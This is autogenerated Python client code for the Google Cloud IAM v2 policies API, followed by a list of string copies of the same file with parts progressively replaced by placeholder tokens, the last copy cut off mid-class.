Delete.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}',
http_method='DELETE',
method_id='iam.policies.delete',
ordered_params=['name'],
path_params=['name'],
query_params=['etag'],
relative_path='v2/{+name}',
request_field='',
request_type_name='IamPoliciesDeleteRequest',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
def Get(self, request, global_params=None):
r"""Gets a policy.
Args:
request: (IamPoliciesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleIamV2Policy) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}',
http_method='GET',
method_id='iam.policies.get',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v2/{+name}',
request_field='',
request_type_name='IamPoliciesGetRequest',
response_type_name='GoogleIamV2Policy',
supports_download=False,
)
def ListPolicies(self, request, global_params=None):
r"""Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.
Args:
request: (IamPoliciesListPoliciesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleIamV2ListPoliciesResponse) The response message.
"""
config = self.GetMethodConfig('ListPolicies')
return self._RunMethod(
config, request, global_params=global_params)
ListPolicies.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v2/policies/{policiesId}/{policiesId1}',
http_method='GET',
method_id='iam.policies.listPolicies',
ordered_params=['parent'],
path_params=['parent'],
query_params=['pageSize', 'pageToken'],
relative_path='v2/{+parent}',
request_field='',
request_type_name='IamPoliciesListPoliciesRequest',
response_type_name='GoogleIamV2ListPoliciesResponse',
supports_download=False,
)
def Update(self, request, global_params=None):
r"""Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. This pattern helps prevent conflicts between concurrent updates.
Args:
request: (GoogleIamV2Policy) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(GoogleLongrunningOperation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}',
http_method='PUT',
method_id='iam.policies.update',
ordered_params=['name'],
path_params=['name'],
query_params=[],
relative_path='v2/{+name}',
request_field='<request>',
request_type_name='GoogleIamV2Policy',
response_type_name='GoogleLongrunningOperation',
supports_download=False,
)
| [
"\"\"\"Generated client library for iam version v2.\"\"\"\n# NOTE: This file is autogenerated and should not be edited by hand.\n\nfrom __future__ import absolute_import\n\nfrom apitools.base.py import base_api\nfrom googlecloudsdk.third_party.apis.iam.v2 import iam_v2_messages as messages\n\n\nclass IamV2(base_api.BaseApiClient):\n \"\"\"Generated client library for service iam version v2.\"\"\"\n\n MESSAGES_MODULE = messages\n BASE_URL = 'https://iam.googleapis.com/'\n MTLS_BASE_URL = 'https://iam.mtls.googleapis.com/'\n\n _PACKAGE = 'iam'\n _SCOPES = ['https://www.googleapis.com/auth/cloud-platform']\n _VERSION = 'v2'\n _CLIENT_ID = 'CLIENT_ID'\n _CLIENT_SECRET = 'CLIENT_SECRET'\n _USER_AGENT = 'google-cloud-sdk'\n _CLIENT_CLASS_NAME = 'IamV2'\n _URL_VERSION = 'v2'\n _API_KEY = None\n\n def __init__(self, url='', credentials=None,\n get_credentials=True, http=None, model=None,\n log_request=False, log_response=False,\n credentials_args=None, default_global_params=None,\n additional_http_headers=None, response_encoding=None):\n \"\"\"Create a new iam handle.\"\"\"\n url = url or self.BASE_URL\n super(IamV2, self).__init__(\n url, credentials=credentials,\n get_credentials=get_credentials, http=http, model=model,\n log_request=log_request, log_response=log_response,\n credentials_args=credentials_args,\n default_global_params=default_global_params,\n additional_http_headers=additional_http_headers,\n response_encoding=response_encoding)\n self.policies_operations = self.PoliciesOperationsService(self)\n self.policies = self.PoliciesService(self)\n\n class PoliciesOperationsService(base_api.BaseApiService):\n \"\"\"Service class for the policies_operations resource.\"\"\"\n\n _NAME = 'policies_operations'\n\n def __init__(self, client):\n super(IamV2.PoliciesOperationsService, self).__init__(client)\n self._upload_configs = {\n }\n\n def Get(self, request, global_params=None):\n r\"\"\"Gets the latest state of a long-running operation. Clients can use this method to poll the operation result at intervals as recommended by the API service.\n\n Args:\n request: (IamPoliciesOperationsGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(\n config, request, global_params=global_params)\n\n Get.method_config = lambda: base_api.ApiMethodInfo(\n flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}',\n http_method='GET',\n method_id='iam.policies.operations.get',\n ordered_params=['name'],\n path_params=['name'],\n query_params=[],\n relative_path='v2/{+name}',\n request_field='',\n request_type_name='IamPoliciesOperationsGetRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False,\n )\n\n class PoliciesService(base_api.BaseApiService):\n \"\"\"Service class for the policies resource.\"\"\"\n\n _NAME = 'policies'\n\n def __init__(self, client):\n super(IamV2.PoliciesService, self).__init__(client)\n self._upload_configs = {\n }\n\n def CreatePolicy(self, request, global_params=None):\n r\"\"\"Creates a policy.\n\n Args:\n request: (IamPoliciesCreatePolicyRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('CreatePolicy')\n return self._RunMethod(\n config, request, global_params=global_params)\n\n CreatePolicy.method_config = lambda: base_api.ApiMethodInfo(\n flat_path='v2/policies/{policiesId}/{policiesId1}',\n http_method='POST',\n method_id='iam.policies.createPolicy',\n ordered_params=['parent'],\n path_params=['parent'],\n query_params=['policyId'],\n relative_path='v2/{+parent}',\n request_field='googleIamV2Policy',\n request_type_name='IamPoliciesCreatePolicyRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False,\n )\n\n def Delete(self, request, global_params=None):\n r\"\"\"Deletes a policy. This action is permanent.\n\n Args:\n request: (IamPoliciesDeleteRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Delete')\n return self._RunMethod(\n config, request, global_params=global_params)\n\n Delete.method_config = lambda: base_api.ApiMethodInfo(\n flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='DELETE',\n method_id='iam.policies.delete',\n ordered_params=['name'],\n path_params=['name'],\n query_params=['etag'],\n relative_path='v2/{+name}',\n request_field='',\n request_type_name='IamPoliciesDeleteRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False,\n )\n\n def Get(self, request, global_params=None):\n r\"\"\"Gets a policy.\n\n Args:\n request: (IamPoliciesGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2Policy) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(\n config, request, global_params=global_params)\n\n Get.method_config = lambda: base_api.ApiMethodInfo(\n flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='GET',\n method_id='iam.policies.get',\n ordered_params=['name'],\n path_params=['name'],\n query_params=[],\n relative_path='v2/{+name}',\n request_field='',\n request_type_name='IamPoliciesGetRequest',\n response_type_name='GoogleIamV2Policy',\n supports_download=False,\n )\n\n def ListPolicies(self, request, global_params=None):\n r\"\"\"Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.\n\n Args:\n request: (IamPoliciesListPoliciesRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2ListPoliciesResponse) The response message.\n \"\"\"\n config = self.GetMethodConfig('ListPolicies')\n return self._RunMethod(\n config, request, global_params=global_params)\n\n ListPolicies.method_config = lambda: base_api.ApiMethodInfo(\n flat_path='v2/policies/{policiesId}/{policiesId1}',\n http_method='GET',\n method_id='iam.policies.listPolicies',\n ordered_params=['parent'],\n path_params=['parent'],\n query_params=['pageSize', 'pageToken'],\n relative_path='v2/{+parent}',\n request_field='',\n request_type_name='IamPoliciesListPoliciesRequest',\n response_type_name='GoogleIamV2ListPoliciesResponse',\n supports_download=False,\n )\n\n def Update(self, request, global_params=None):\n r\"\"\"Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. This pattern helps prevent conflicts between concurrent updates.\n\n Args:\n request: (GoogleIamV2Policy) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Update')\n return self._RunMethod(\n config, request, global_params=global_params)\n\n Update.method_config = lambda: base_api.ApiMethodInfo(\n flat_path='v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='PUT',\n method_id='iam.policies.update',\n ordered_params=['name'],\n path_params=['name'],\n query_params=[],\n relative_path='v2/{+name}',\n request_field='<request>',\n request_type_name='GoogleIamV2Policy',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False,\n )\n",
"<docstring token>\nfrom __future__ import absolute_import\nfrom apitools.base.py import base_api\nfrom googlecloudsdk.third_party.apis.iam.v2 import iam_v2_messages as messages\n\n\nclass IamV2(base_api.BaseApiClient):\n \"\"\"Generated client library for service iam version v2.\"\"\"\n MESSAGES_MODULE = messages\n BASE_URL = 'https://iam.googleapis.com/'\n MTLS_BASE_URL = 'https://iam.mtls.googleapis.com/'\n _PACKAGE = 'iam'\n _SCOPES = ['https://www.googleapis.com/auth/cloud-platform']\n _VERSION = 'v2'\n _CLIENT_ID = 'CLIENT_ID'\n _CLIENT_SECRET = 'CLIENT_SECRET'\n _USER_AGENT = 'google-cloud-sdk'\n _CLIENT_CLASS_NAME = 'IamV2'\n _URL_VERSION = 'v2'\n _API_KEY = None\n\n def __init__(self, url='', credentials=None, get_credentials=True, http\n =None, model=None, log_request=False, log_response=False,\n credentials_args=None, default_global_params=None,\n additional_http_headers=None, response_encoding=None):\n \"\"\"Create a new iam handle.\"\"\"\n url = url or self.BASE_URL\n super(IamV2, self).__init__(url, credentials=credentials,\n get_credentials=get_credentials, http=http, model=model,\n log_request=log_request, log_response=log_response,\n credentials_args=credentials_args, default_global_params=\n default_global_params, additional_http_headers=\n additional_http_headers, response_encoding=response_encoding)\n self.policies_operations = self.PoliciesOperationsService(self)\n self.policies = self.PoliciesService(self)\n\n\n class PoliciesOperationsService(base_api.BaseApiService):\n \"\"\"Service class for the policies_operations resource.\"\"\"\n _NAME = 'policies_operations'\n\n def __init__(self, client):\n super(IamV2.PoliciesOperationsService, self).__init__(client)\n self._upload_configs = {}\n\n def Get(self, request, global_params=None):\n \"\"\"Gets the latest state of a long-running operation. Clients can use this method to poll the operation result at intervals as recommended by the API service.\n\n Args:\n request: (IamPoliciesOperationsGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}'\n , http_method='GET', method_id='iam.policies.operations.get',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='', request_type_name\n ='IamPoliciesOperationsGetRequest', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n\n\n class PoliciesService(base_api.BaseApiService):\n \"\"\"Service class for the policies resource.\"\"\"\n _NAME = 'policies'\n\n def __init__(self, client):\n super(IamV2.PoliciesService, self).__init__(client)\n self._upload_configs = {}\n\n def CreatePolicy(self, request, global_params=None):\n \"\"\"Creates a policy.\n\n Args:\n request: (IamPoliciesCreatePolicyRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('CreatePolicy')\n return self._RunMethod(config, request, global_params=global_params\n )\n CreatePolicy.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='POST',\n method_id='iam.policies.createPolicy', ordered_params=['parent'\n ], path_params=['parent'], query_params=['policyId'],\n relative_path='v2/{+parent}', request_field='googleIamV2Policy',\n request_type_name='IamPoliciesCreatePolicyRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Delete(self, request, global_params=None):\n \"\"\"Deletes a policy. This action is permanent.\n\n Args:\n request: (IamPoliciesDeleteRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Delete')\n return self._RunMethod(config, request, global_params=global_params\n )\n Delete.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='DELETE', method_id='iam.policies.delete',\n ordered_params=['name'], path_params=['name'], query_params=[\n 'etag'], relative_path='v2/{+name}', request_field='',\n request_type_name='IamPoliciesDeleteRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Get(self, request, global_params=None):\n \"\"\"Gets a policy.\n\n Args:\n request: (IamPoliciesGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2Policy) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='GET', method_id='iam.policies.get', ordered_params\n =['name'], path_params=['name'], query_params=[], relative_path\n ='v2/{+name}', request_field='', request_type_name=\n 'IamPoliciesGetRequest', response_type_name='GoogleIamV2Policy',\n supports_download=False)\n\n def ListPolicies(self, request, global_params=None):\n \"\"\"Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.\n\n Args:\n request: (IamPoliciesListPoliciesRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2ListPoliciesResponse) The response message.\n \"\"\"\n config = self.GetMethodConfig('ListPolicies')\n return self._RunMethod(config, request, global_params=global_params\n )\n ListPolicies.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='GET',\n method_id='iam.policies.listPolicies', ordered_params=['parent'\n ], path_params=['parent'], query_params=['pageSize',\n 'pageToken'], relative_path='v2/{+parent}', request_field='',\n request_type_name='IamPoliciesListPoliciesRequest',\n response_type_name='GoogleIamV2ListPoliciesResponse',\n supports_download=False)\n\n def Update(self, request, global_params=None):\n \"\"\"Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. This pattern helps prevent conflicts between concurrent updates.\n\n Args:\n request: (GoogleIamV2Policy) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Update')\n return self._RunMethod(config, request, global_params=global_params\n )\n Update.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='PUT', method_id='iam.policies.update',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='<request>',\n request_type_name='GoogleIamV2Policy', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n",
"<docstring token>\n<import token>\n\n\nclass IamV2(base_api.BaseApiClient):\n \"\"\"Generated client library for service iam version v2.\"\"\"\n MESSAGES_MODULE = messages\n BASE_URL = 'https://iam.googleapis.com/'\n MTLS_BASE_URL = 'https://iam.mtls.googleapis.com/'\n _PACKAGE = 'iam'\n _SCOPES = ['https://www.googleapis.com/auth/cloud-platform']\n _VERSION = 'v2'\n _CLIENT_ID = 'CLIENT_ID'\n _CLIENT_SECRET = 'CLIENT_SECRET'\n _USER_AGENT = 'google-cloud-sdk'\n _CLIENT_CLASS_NAME = 'IamV2'\n _URL_VERSION = 'v2'\n _API_KEY = None\n\n def __init__(self, url='', credentials=None, get_credentials=True, http\n =None, model=None, log_request=False, log_response=False,\n credentials_args=None, default_global_params=None,\n additional_http_headers=None, response_encoding=None):\n \"\"\"Create a new iam handle.\"\"\"\n url = url or self.BASE_URL\n super(IamV2, self).__init__(url, credentials=credentials,\n get_credentials=get_credentials, http=http, model=model,\n log_request=log_request, log_response=log_response,\n credentials_args=credentials_args, default_global_params=\n default_global_params, additional_http_headers=\n additional_http_headers, response_encoding=response_encoding)\n self.policies_operations = self.PoliciesOperationsService(self)\n self.policies = self.PoliciesService(self)\n\n\n class PoliciesOperationsService(base_api.BaseApiService):\n \"\"\"Service class for the policies_operations resource.\"\"\"\n _NAME = 'policies_operations'\n\n def __init__(self, client):\n super(IamV2.PoliciesOperationsService, self).__init__(client)\n self._upload_configs = {}\n\n def Get(self, request, global_params=None):\n \"\"\"Gets the latest state of a long-running operation. Clients can use this method to poll the operation result at intervals as recommended by the API service.\n\n Args:\n request: (IamPoliciesOperationsGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}'\n , http_method='GET', method_id='iam.policies.operations.get',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='', request_type_name\n ='IamPoliciesOperationsGetRequest', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n\n\n class PoliciesService(base_api.BaseApiService):\n \"\"\"Service class for the policies resource.\"\"\"\n _NAME = 'policies'\n\n def __init__(self, client):\n super(IamV2.PoliciesService, self).__init__(client)\n self._upload_configs = {}\n\n def CreatePolicy(self, request, global_params=None):\n \"\"\"Creates a policy.\n\n Args:\n request: (IamPoliciesCreatePolicyRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('CreatePolicy')\n return self._RunMethod(config, request, global_params=global_params\n )\n CreatePolicy.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='POST',\n method_id='iam.policies.createPolicy', ordered_params=['parent'\n ], path_params=['parent'], query_params=['policyId'],\n relative_path='v2/{+parent}', request_field='googleIamV2Policy',\n request_type_name='IamPoliciesCreatePolicyRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Delete(self, request, global_params=None):\n \"\"\"Deletes a policy. This action is permanent.\n\n Args:\n request: (IamPoliciesDeleteRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Delete')\n return self._RunMethod(config, request, global_params=global_params\n )\n Delete.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='DELETE', method_id='iam.policies.delete',\n ordered_params=['name'], path_params=['name'], query_params=[\n 'etag'], relative_path='v2/{+name}', request_field='',\n request_type_name='IamPoliciesDeleteRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Get(self, request, global_params=None):\n \"\"\"Gets a policy.\n\n Args:\n request: (IamPoliciesGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2Policy) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='GET', method_id='iam.policies.get', ordered_params\n =['name'], path_params=['name'], query_params=[], relative_path\n ='v2/{+name}', request_field='', request_type_name=\n 'IamPoliciesGetRequest', response_type_name='GoogleIamV2Policy',\n supports_download=False)\n\n def ListPolicies(self, request, global_params=None):\n \"\"\"Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.\n\n Args:\n request: (IamPoliciesListPoliciesRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2ListPoliciesResponse) The response message.\n \"\"\"\n config = self.GetMethodConfig('ListPolicies')\n return self._RunMethod(config, request, global_params=global_params\n )\n ListPolicies.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='GET',\n method_id='iam.policies.listPolicies', ordered_params=['parent'\n ], path_params=['parent'], query_params=['pageSize',\n 'pageToken'], relative_path='v2/{+parent}', request_field='',\n request_type_name='IamPoliciesListPoliciesRequest',\n response_type_name='GoogleIamV2ListPoliciesResponse',\n supports_download=False)\n\n def Update(self, request, global_params=None):\n \"\"\"Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. This pattern helps prevent conflicts between concurrent updates.\n\n Args:\n request: (GoogleIamV2Policy) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Update')\n return self._RunMethod(config, request, global_params=global_params\n )\n Update.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='PUT', method_id='iam.policies.update',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='<request>',\n request_type_name='GoogleIamV2Policy', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n",
"<docstring token>\n<import token>\n\n\nclass IamV2(base_api.BaseApiClient):\n <docstring token>\n MESSAGES_MODULE = messages\n BASE_URL = 'https://iam.googleapis.com/'\n MTLS_BASE_URL = 'https://iam.mtls.googleapis.com/'\n _PACKAGE = 'iam'\n _SCOPES = ['https://www.googleapis.com/auth/cloud-platform']\n _VERSION = 'v2'\n _CLIENT_ID = 'CLIENT_ID'\n _CLIENT_SECRET = 'CLIENT_SECRET'\n _USER_AGENT = 'google-cloud-sdk'\n _CLIENT_CLASS_NAME = 'IamV2'\n _URL_VERSION = 'v2'\n _API_KEY = None\n\n def __init__(self, url='', credentials=None, get_credentials=True, http\n =None, model=None, log_request=False, log_response=False,\n credentials_args=None, default_global_params=None,\n additional_http_headers=None, response_encoding=None):\n \"\"\"Create a new iam handle.\"\"\"\n url = url or self.BASE_URL\n super(IamV2, self).__init__(url, credentials=credentials,\n get_credentials=get_credentials, http=http, model=model,\n log_request=log_request, log_response=log_response,\n credentials_args=credentials_args, default_global_params=\n default_global_params, additional_http_headers=\n additional_http_headers, response_encoding=response_encoding)\n self.policies_operations = self.PoliciesOperationsService(self)\n self.policies = self.PoliciesService(self)\n\n\n class PoliciesOperationsService(base_api.BaseApiService):\n \"\"\"Service class for the policies_operations resource.\"\"\"\n _NAME = 'policies_operations'\n\n def __init__(self, client):\n super(IamV2.PoliciesOperationsService, self).__init__(client)\n self._upload_configs = {}\n\n def Get(self, request, global_params=None):\n \"\"\"Gets the latest state of a long-running operation. Clients can use this method to poll the operation result at intervals as recommended by the API service.\n\n Args:\n request: (IamPoliciesOperationsGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}/operations/{operationsId}'\n , http_method='GET', method_id='iam.policies.operations.get',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='', request_type_name\n ='IamPoliciesOperationsGetRequest', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n\n\n class PoliciesService(base_api.BaseApiService):\n \"\"\"Service class for the policies resource.\"\"\"\n _NAME = 'policies'\n\n def __init__(self, client):\n super(IamV2.PoliciesService, self).__init__(client)\n self._upload_configs = {}\n\n def CreatePolicy(self, request, global_params=None):\n \"\"\"Creates a policy.\n\n Args:\n request: (IamPoliciesCreatePolicyRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('CreatePolicy')\n return self._RunMethod(config, request, global_params=global_params\n )\n CreatePolicy.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='POST',\n method_id='iam.policies.createPolicy', ordered_params=['parent'\n ], path_params=['parent'], query_params=['policyId'],\n relative_path='v2/{+parent}', request_field='googleIamV2Policy',\n request_type_name='IamPoliciesCreatePolicyRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Delete(self, request, global_params=None):\n \"\"\"Deletes a policy. This action is permanent.\n\n Args:\n request: (IamPoliciesDeleteRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Delete')\n return self._RunMethod(config, request, global_params=global_params\n )\n Delete.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='DELETE', method_id='iam.policies.delete',\n ordered_params=['name'], path_params=['name'], query_params=[\n 'etag'], relative_path='v2/{+name}', request_field='',\n request_type_name='IamPoliciesDeleteRequest',\n response_type_name='GoogleLongrunningOperation',\n supports_download=False)\n\n def Get(self, request, global_params=None):\n \"\"\"Gets a policy.\n\n Args:\n request: (IamPoliciesGetRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2Policy) The response message.\n \"\"\"\n config = self.GetMethodConfig('Get')\n return self._RunMethod(config, request, global_params=global_params\n )\n Get.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='GET', method_id='iam.policies.get', ordered_params\n =['name'], path_params=['name'], query_params=[], relative_path\n ='v2/{+name}', request_field='', request_type_name=\n 'IamPoliciesGetRequest', response_type_name='GoogleIamV2Policy',\n supports_download=False)\n\n def ListPolicies(self, request, global_params=None):\n \"\"\"Retrieves the policies of the specified kind that are attached to a resource. The response lists only policy metadata. In particular, policy rules are omitted.\n\n Args:\n request: (IamPoliciesListPoliciesRequest) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleIamV2ListPoliciesResponse) The response message.\n \"\"\"\n config = self.GetMethodConfig('ListPolicies')\n return self._RunMethod(config, request, global_params=global_params\n )\n ListPolicies.method_config = lambda : base_api.ApiMethodInfo(flat_path\n ='v2/policies/{policiesId}/{policiesId1}', http_method='GET',\n method_id='iam.policies.listPolicies', ordered_params=['parent'\n ], path_params=['parent'], query_params=['pageSize',\n 'pageToken'], relative_path='v2/{+parent}', request_field='',\n request_type_name='IamPoliciesListPoliciesRequest',\n response_type_name='GoogleIamV2ListPoliciesResponse',\n supports_download=False)\n\n def Update(self, request, global_params=None):\n \"\"\"Updates the specified policy. You can update only the rules and the display name for the policy. To update a policy, you should use a read-modify-write loop: 1. Use GetPolicy to read the current version of the policy. 2. Modify the policy as needed. 3. Use `UpdatePolicy` to write the updated policy. This pattern helps prevent conflicts between concurrent updates.\n\n Args:\n request: (GoogleIamV2Policy) input message\n global_params: (StandardQueryParameters, default: None) global arguments\n Returns:\n (GoogleLongrunningOperation) The response message.\n \"\"\"\n config = self.GetMethodConfig('Update')\n return self._RunMethod(config, request, global_params=global_params\n )\n Update.method_config = lambda : base_api.ApiMethodInfo(flat_path=\n 'v2/policies/{policiesId}/{policiesId1}/{policiesId2}',\n http_method='PUT', method_id='iam.policies.update',\n ordered_params=['name'], path_params=['name'], query_params=[],\n relative_path='v2/{+name}', request_field='<request>',\n request_type_name='GoogleIamV2Policy', response_type_name=\n 'GoogleLongrunningOperation', supports_download=False)\n",
"<docstring token>\n<import token>\n\n\nclass IamV2(base_api.BaseApiClient):\n <docstring token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n <assignment token>\n\n def __init__(self, url='', credentials=None, get_credentials=True, http\n =None, model=None, log_request=False, log_response=False,\n credentials_args=None, default_global_params=None,\n additional_http_headers=None, response_encoding=None):\n \"\"\"Create a new iam handle.\"\"\"\n url = url or self.BASE_URL\n super(IamV2, self).__init__(url, credentials=credentials,\n get_credentials=get_credentials, http=http, model=model,\n log_request=log_request, log_response=log_response,\n credentials_args=credentials_args, default_global_params=\n default_global_params, additional_http_headers=\n additional_http_headers, response_encoding=response_encoding)\n self.policies_operations = self.PoliciesOperationsService(self)\n self.policies = self.PoliciesService(self)\n\n\n class 